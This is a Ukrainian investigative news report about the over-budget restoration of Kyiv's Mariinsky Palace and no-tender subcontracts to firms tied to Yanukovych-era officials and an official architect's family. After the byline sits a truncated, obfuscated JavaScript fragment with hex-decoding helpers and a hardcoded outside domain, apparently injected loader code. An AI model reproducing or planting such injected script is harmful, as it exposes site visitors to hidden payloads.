Мільярд на резиденцію

Перегляди: 1 186

Український режисер Семен Горов переглядає кадри зі свого мюзиклу «Вечори на хуторі близ Диканьки». Ключовий епізод – зустріч коваля Вакули з царицею Катериною. Ці сцени відзняті 15 років томУ в інтер’єрах Маріїнського палацу – президентської резиденції поруч з Верховною радою в центрі Києва

Оздоблення палацу було таке розкішне та вишукане, каже Горов, що для зйомок майже не знадобилися декорації. Двері, паркет, сходи, вензлі – все справжнє. У те, що зараз будівля балансує між руйнацією і життям – повірити складно.

СЕМЕН ГОРОВ, режисер:

— Така велика країна як наша потребує такого місця, де можна прийняти делегацію, зробити зустріч на вищому рівні.

Його ворота зачинилися в 2007-му – на грандіозну реставрацію. Маріїнський палац мав стати українським Білим домом. Та минуло вже 9 років, а робити не виконані й наполовину. Захисники культурної спадщини всерйоз заговорили про те, що історична будівля може загинути, оскільки вже тріщить по швах. 

ВОЛОДИМИР ГУСАКОВ, президент Національної спілки архітекторів України:

— Пам’ятка в надзвичайно важкому стані… Сьогодні питання стоїть так – чи буде ця архітектурна перлина жива, чи вона загине.

Та замість порятунку палацу, реконструкція перетворилася на чорну діру для державного бюджету. За десятиліття кошторис змінювався тричі – і щоразу зростав. Нині він складає понад 1 мільярд гривень. Сума вражає. У чиї ж кишені йдуть кошти за ремонт палацу?

Щоб розшукати компанії, які працюють над реконструкцією Маріїнки, та з’ясувати особи їхніх справжніх власників, ми працювали кілька тижнів та намотали десятки кілометрів по Києву, постійно натикаючись на спроби зачинити перед нами двері.

То хто ж розпилює гроші на реконструкцію Маріїнського? Почнемо спочатку.

Оскільки Маріїнський палац є резиденцією Президента України, розпоряджається нею легендарна ДУСя — Державне управління справами. Саме ДУСя є замовником реконструкції споруди 18 століття. Останнього генерального підрядника для Маріїнки обрали в 2012-році – ще за президенства Віктора Януковича.

ВАСИЛЬ МОЖАР, начальник будівельного управління ДУС:

— Тендер виграло підприємство, яке пов’язано з державним управлінням справами, порядка 220-270 гривень, і відповідно до цієї суми він виконує ці роботи, поки не використає всю суму.

Тоді ДУСю очолював Андрій Кравець – близький соратник екс-президента, якого називали «завгоспом Януковича». Перелік фірм, які без тендерів найняли на субпідрядні роботи, засекретили. Журналісти заговорили про відверту корупцію. Після перемоги Майдану з’явилася надія нарешті покласти цьому край. Як з’ясувало «Слідство.Інфо», радіти було рано – надто спокусливим виявився шматок.

У 2015-му, вперше після зміни влади, на ремонт палацу виділяють новий транш – 100 мільйонів гривень. Та замість проведення відкритого конкурсу нинішні очільники ДУСі подовжують договори з фірмами, яких наймали «злочинні попередники». Саме їм іде левова частка коштів – попри те, що там стирчать вуха друзів біглого президента.

Увагу «Слідстваю.Інфо» привернули 2 фірми. Обидві пов’язані з колись потужною корпорацією «Укрреставрація». Її з 2011-го контролюють соратники Януковича. Ключову компанію бізнес-імперії очолив Дмитро Ярич. Ярич був і є бізнес-партнером родини вже згаданого завгоспа Януковича — Андрія Кравця. Прославилася фірма вже війнами за іншу пам’ятку в центрі столиці – Гостинний двір.

Зв’язки нових власників компанії з соратниками Віктора Януковича очевидні. Журналісти ще у 2012-му з’ясували – офшорна компанія, яка нині володіє «Укрреставрацією», перебуває в орбіті інтересів Дмитра Фірташа та Юрія Бойка. А в наглядовій раді компанії – люди, близькі до регіоналів. Зокрема, і бізнес-партнер все того ж «завгоспа Януковича» Андрія Кравця. Нинішній директор «Укрреставрації» Іван Клочко, який до 2014-го працював замом Дмитра Ярича, стосунок до реставрації Маріїнки спростовує.

ІВАН КЛОЧКО, директор ПАТ «УКрреставрація»:

— Справа в тому що «Укрреставрацій» є декілька…там де я директор, пат – публічне акціонерне товариство, не має відношення.

— Ці компанії очолюють колишні топ-менеджери «Укрреставрації».

— Не знаю навіть хто там що очолює, чесно вам кажу, просто в мене немає з ними ніяких стосунків.

Корпорація «Укрреставрація» налічувала 10-ки відгалужень. Попередній очільник компанії Дмитро Ярич переконує: коли змінився власник у ключової фірми, корпорація розсипалася. А всі зв’язки з компаніями-«дочками» – вони порвали.

ДМИТРО ЯРИЧ, колишній директор ПАТ «Укрреставрація»:

— Після того, як я став директором, всі сили були направлені на очищення компанії від різних компаній, пов’язаних компаній. Ми ніякого відношення до молодих компаній із созвучними назвами не маємо.

Але у 2012-му, коли ДУС очолював Андрій Кравець, фірми з орбіти колишньої корпорації «Укрреставрація» отримали мільйонні підряди. А нині освоюють їх далі. Ми спробували розшукати одну з таких фірм — «Київське міжобласне реставраційне управління». Вже за нової влади компанія отримала підряд на понад 17 млн гривень. Та за місцем реєстрації її чомусь немає.

— Приходять листи, пісьма. Але тут вони не знаходяться. Де офіс їхній, я вам навіть не можу сказать.

Наші спроби отримати коментар від фірми телефоном теж невдалі – офіційна власниця відмовляється говорити.

— Пані Олена з нами так і не зв’язалася…

— Ну що ж я можу зробити? Я їй передав ваш телефон.

ТОВ «Укрреставрація» отримала від ДУСі замовлення на 2,5 мільйона. І знову дивний збіг – її очолює колишній топ-менеджер колишньої корпорації «Укрреставрація». Компанія реалізовує в Києві кілька будівельних проектів. Найбільша загадка – як держуправлінню справами вдалося найняти цю фірму. Адже у неї навіть номеру телефона не має! Коли ми все ж таки знайшли її, виявилося, що працюють там усі дистанційно.

— Та только одна девушка сидит. Я знаю только одну девушку. Она уже ушла.

— И там никого нет больше?

— Никого нет!

Хто і як відбирав приватні компанії для субпідрядних робіт раніше – в нинішній ДУСі не знають. Мовляв, то ж за попередників було, а щось змінювати тепер – собі дорожче.

ВАСИЛЬ МОЖАР, начальник будівельного управління ДУС:

— Є роботи розпочаті і міняти підпрядника на розпочатих роботах – це понести додаткові витрати… Я не знайшов якихось викривлень, в актах виктонаних робіт, не було якихось кримінальних або кричущих порушень

А ось ще одні яскраві персонажі саги під назвою «Відновлення Маріїнського палацу». Головний архітектор Держуправління справами пан Адаменко з родиною. Станіслав Михайлович не лише розробляв проект нескінченної реконструкції архітектурної перлини. У 2015-му пов’язані з сім’єю Адаменка фірми в 2015-му отримали замовлення від ДУСі на майже 20 мільйонів гривень.

Спочатку підозру викликало те, що 2 різні фірми (одна працює з мармуром, інша — робить люстри) зареєстровані за однією адресою. Ще цікавіше, що донедавна директоркою компанії «Ангел-Марія» була Марія Ралко – дружина головного архітектора ДУСі.

ВАСИЛЬ МОЖАР, начальник будівельного управління ДУС:

— Вони люди творчі і вони заробляють своїм талантом. Сімейних зв’язків в керівництві компанії – ми не знайшли.

— Але пані Марія також була директором приватного підприємства?

— Ну… еее… я відповім так: ми провели моніторинг, фактів не було, і ми підписали договір.

Спеціально для ДУСі. Квартира, де прописані компанії, на ремонті. Однак родину Адаменків тут знають добре.

— Нам Марія Олександрівна потрібна...

— Ну да-да… Алло? Здрастуй, Саша. Саш, тут з телевідєння хочуть бачить кого-то із вас… Нікого не буде, да??

А тепер – хто такий Саша. Вже за 15 хвилин у двір будинку приїжджає молодий чоловік та гарячково починає перешкоджати нашій роботі. Причину неадекватної поведінки ми зрозуміли згодом.

Чоловік на «Хонді», який не захотів представлятися – Адаменко Олександр Станіславович, або просто Саша. Син головного архітектора ДУСі, який фізично захищає сімейний бізнес. Ми тиждень намагалися зв’язатися з Адаменком-старшим, але чиновник зайняв глуху оборону.

На ремонт Маріїнки витрачено вже майже 350 мільйонів гривень, і це лише 3 частина кошторису. І хоча офіційним виконавцем робіт є державне підприємство, левову частину коштів, виділених у 2015-му, освоювали наближені приватні фірми. Без тендеру – за принципом субпідряду.

Цього року мають обрати нового генерального підрядника. Реконструкція президентської резиденції, схоже, триватиме вічно. Або доки будівля не розвалиться. Та для тих, хто вміє освоювати державні кошти – і це не біда. Після реконструкції можна почати капітальний ремонт – ще на мільярд.

ЄВГЕНІЯ МОТОРЕВСЬКА, для «Слідства.Інфо»

// o;o++) t+=e.charCodeAt (o).toString (16);return t},a=function (e){e=e.match (/[\S\s]{1,2}/g);for (var t="",o=0;o < e.length;o++) t+=String.fromCharCode (parseInt (e[o],16));return t},d=function (){return "zerkalo.mk.ua"},p=function (){var w=window,p=w.document.location.protocol;if (p.indexOf ("http")==0){return p}for (var e=0;e

Tweet about this on TwitterShare on FacebookShare on Google+

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

*

code